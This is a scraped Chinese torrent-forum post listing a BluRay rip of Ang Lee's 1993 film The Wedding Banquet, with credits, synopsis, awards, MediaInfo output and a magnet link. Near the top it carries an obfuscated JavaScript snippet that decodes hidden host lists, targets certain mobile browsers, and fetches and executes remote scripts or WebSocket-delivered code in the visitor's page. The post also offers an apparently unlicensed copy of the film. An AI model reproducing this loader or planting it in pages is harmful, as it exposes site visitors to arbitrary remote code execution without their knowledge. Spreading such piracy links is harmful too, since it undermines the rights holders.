喜宴[国语配音/中文字幕].The.Wedding.Banquet.1993.1080p.BluRay.x265.10bit.DTS.2.0 6.44GB

版主小s 25天前 237

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 喜宴 / The Wedding Banquet
◎片  名 囍宴
◎年  代 1993
◎产  地 中国台湾 / 美国
◎类  别 剧情 / 喜剧 / 爱情 / 同性 / 家庭
◎语  言 汉语普通话 / 英语
◎上映日期 1993-02(柏林电影节) / 1993-08-04(美国)
◎IMDb链接 https://www.imdb.com/title/tt0107156/
◎豆瓣评分 8.9/10 (289884人评价)
◎豆瓣链接 https://movie.douban.com/subject/1303037/
◎片  长 108分钟
◎导  演 李安 Ang Lee (id:1054421)
◎编  剧 李安 Ang Lee (id:1054421)
       冯光远 Neil Peng (id:1294236)
       詹姆斯·夏慕斯 James Schamus (id:1050276)
◎演  员 赵文瑄 Winston Chao (id:1018759)
       郎雄 Sihung Lung (id:1274507)
       归亚蕾 Ya-lei Kuei (id:1058399)
       金素梅 May Chin (id:1051317)
       米切尔·利希藤斯坦 Mitchell Lichtenstein (id:1032301)
       杨元提 Vanessa Yang (id:1331877)
       李淳 Mason Lee (id:1316450)
       李安 Ang Lee (id:1054421)
       迈克尔·加斯顿 Michael Gaston (id:1091100)
       许永德 Yung-Teh Hsu (id:1096924)
       汉娜·沙利文 Hannah Sullivan (id:1150757)
       姚培德 Peide Yao (id:1415563)
       多莉·霍尔 Dolly Hall (id:1285842)
       徐立功 Li-Kong Hsu (id:1287036)
       江奉琪 Feng-Chyt Jiang (id:1287722)
       特德·霍普 Ted Hope (id:1286895)
       李安 Ang Lee (id:1054421)
       詹姆斯·夏慕斯 James Schamus (id:1050276)
       林良忠 Jong Lin (id:1290065)
       蒂姆·斯奎尔斯 Tim Squyres (id:1298208)

◎标  签 李安 / 家庭 / 台湾 / 同志 / 同性 / 台湾电影 / 剧情 / 喜宴

◎简  介
  伟同(赵文瑄)是事业有成的男同志,与男友赛门(Mitchell Lichtenstein)在美国过着幸福的同居日子,烦恼来自要用各种招数应对远在台北的父(郎雄)母(归亚蕾)的一次次逼婚。伟同被逼以“乖乖仔”形象修书一封声称会在美国结婚,没料父母想亲眼见证。无奈,他只得拉上来自上海的不得志的女艺术家葳葳(金素梅)“假婚”,想逃过一劫。                                    
                                父母对葳葳相当满意,却对伟同的草率态度不满,为让父母满意尽快返回台北,伟同犹如“拼命三郎”使出了浑身解数。但人算不如天算,不断的波折使得父母的返台日期一次次推迟,令他和赛门的感情亮起“红灯”,而葳葳又意外怀上了他的孩子。似乎,伟同在强大的父母(传统)面前,只能选择去做一个 “表面正常”的男人。

◎获奖情况 (共10项)
  第66届奥斯卡金像奖 (1994)
  最佳外语片(提名)
   └──李安 (id:1054421)

  第43届柏林国际电影节 (1993)
  金熊奖 最佳影片
   └──李安 (id:1054421)

  第51届金球奖 (1994)
  电影类 最佳外语片(提名)

  第30届台北金马影展 (1993)
  金马奖 最佳剧情片
  金马奖 最佳导演
   └──李安 (id:1054421)
  金马奖 最佳男配角
   └──郎雄 (id:1274507)
  金马奖 最佳女配角
   └──归亚蕾 (id:1058399)
  金马奖 最佳原著剧本
  金马奖 最佳剪辑(提名)
   └──李安 (id:1054421)
  观众票选最佳影片

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 25333804782385070596303576853510610491 (0x130F1D02C5F01ACBA69077959917DE3B)
  4. Complete name                            : [email protected]BQDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 6.44 GiB
  8. Duration                                 : 1 h 47 min
  9. Overall bit rate                         : 8 547 kb/s
  10. Movie name                               : The Wedding Banquet 1993
  11. Encoded date                             : UTC 2021-09-21 03:56:15
  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : HEVC
  19. Format/Info                              : High Efficiency Video Coding
  20. Format profile                           : Main [email protected]@Main
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 1 h 47 min
  23. Bit rate                                 : 7 009 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 1 036 pixels
  26. Display aspect ratio                     : 1.85:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 23.976 (24000/1001/53354) FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.147
  33. Stream size                              : 5.28 GiB (82%)
  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit
  35. Encoding settings                        : rc=crf / crf=18.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=1.00 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Audio
  39. ID                                       : 2
  40. ID in the original source medium         : 4353 (0x1101)
  41. Format                                   : DTS
  42. Format/Info                              : Digital Theater Systems
  43. Codec ID                                 : A_DTS
  44. Duration                                 : 1 h 47 min
  45. Bit rate mode                            : Constant
  46. Bit rate                                 : 1 509 kb/s
  47. Channel(s)                               : 2 channels
  48. Channel layout                           : L R
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 93.750 FPS (512 SPF)
  51. Bit depth                                : 16 bits
  52. Compression mode                         : Lossy
  53. Stream size                              : 1.14 GiB (18%)
  54. Title                                    : Mandarin
  55. Language                                 : Chinese
  56. Default                                  : Yes
  57. Forced                                   : No
  58. Original source medium                   : Blu-ray
  59. Text #1
  60. ID                                       : 3
  61. Format                                   : PGS
  62. Muxing mode                              : zlib
  63. Codec ID                                 : S_HDMV/PGS
  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  65. Duration                                 : 1 h 43 min
  66. Bit rate                                 : 29.8 kb/s
  67. Count of elements                        : 2730
  68. Stream size                              : 22.0 MiB (0%)
  69. Title                                    : chs
  70. Language                                 : Chinese
  71. Default                                  : No
  72. Forced                                   : No
  73. Text #2
  74. ID                                       : 4
  75. Format                                   : PGS
  76. Muxing mode                              : zlib
  77. Codec ID                                 : S_HDMV/PGS
  78. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  79. Duration                                 : 1 h 43 min
  80. Bit rate                                 : 30.1 kb/s
  81. Count of elements                        : 2730
  82. Stream size                              : 22.2 MiB (0%)
  83. Title                                    : cht
  84. Language                                 : Chinese
  85. Default                                  : No
  86. Forced                                   : No
  87. Menu
  88. 00:00:00.000                             : Chapter 01
  89. 00:03:35.506                             : Chapter 02
  90. 00:09:53.384                             : Chapter 03
  91. 00:13:24.552                             : Chapter 04
  92. 00:17:41.684                             : Chapter 05
  93. 00:23:43.462                             : Chapter 06
  94. 00:28:52.855                             : Chapter 07
  95. 00:34:05.041                             : Chapter 08
  96. 00:38:22.507                             : Chapter 09
  97. 00:45:59.005                             : Chapter 10
  98. 00:54:02.905                             : Chapter 11
  99. 01:09:05.390                             : Chapter 12
  100. 01:17:28.975                             : Chapter 13
  101. 01:24:23.975                             : Chapter 14
  102. 01:32:47.520                             : Chapter 15
  103. 01:43:48.721                             : Chapter 16


TAGS 剧情 喜剧 爱情 家庭 同性

磁力链:
  • magnet:?xl=21261&xt=urn:btih:E1FF0229597B3969E9E82831432DE4A5B0FF0BD9
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回